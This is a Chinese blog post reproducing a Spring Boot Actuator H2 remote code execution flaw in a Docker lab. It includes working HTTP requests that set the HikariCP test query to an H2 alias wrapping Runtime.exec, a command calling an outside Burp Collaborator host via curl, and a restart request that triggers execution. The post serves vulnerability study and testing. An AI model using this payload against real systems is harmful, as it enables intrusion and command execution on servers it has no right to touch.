zoukankan      html  css  js  c++  java
  • Spring Boot Actuator H2 RCE复现

    0x00 前言

    Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程。当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。

    0x01 环境搭建

    (1) 克隆github上的项目

    git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git
    

    (2) 使用docker启动环境

    先cd进入spring-boot-actuator-h2-rce目录然后执行以下命令

    docker build -t spaceraccoon/spring-boot-rce-lab .
    docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab
    

    (3) 访问:http://192.168.222.143:8080/actuator

    0x02 漏洞复现

    (1)发送如下POST包配置spring.datasource.hikari.connection-test-query的值

    POST /actuator/env HTTP/1.1
    Host: 192.168.222.143:8080
    Content-Type: application/json
    Content-Length: 393
    
    {"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl xfg7urtufj4yfu1t75ztl7q1xs3ir7.burpcollaborator.net');"}
    

    (2)查看/actuator/env

    (3)向端点 /actuator/restart 发送POST请求,重启应用

    POST /actuator/restart HTTP/1.1
    Host: 192.168.222.143:8080
    Content-Type: application/json
    Content-Length: 2
    
    {}
    

    (4) 查看dnslog可以看到成功执行命令收到请求

  • 相关阅读:
    Smobiler 仿知乎APP个人主页
    smobiler仿自如app筛选页面
    Smobiler 仿美柚APP个人主页
    谈谈网络协议 – 物理层
    谈谈网络协议 – 路由
    谈谈网络协议 – 基础知识
    Flutter(三):Flutter App 可行性分析
    Flutter(二):编写第一个Flutter App
    Flutter(一):MAC的Flutter安装指南
    Jetpack新成员,Paging3从吐槽到真香
  • 原文地址:https://www.cnblogs.com/cwkiller/p/12829974.html
Copyright © 2011-2022 走看看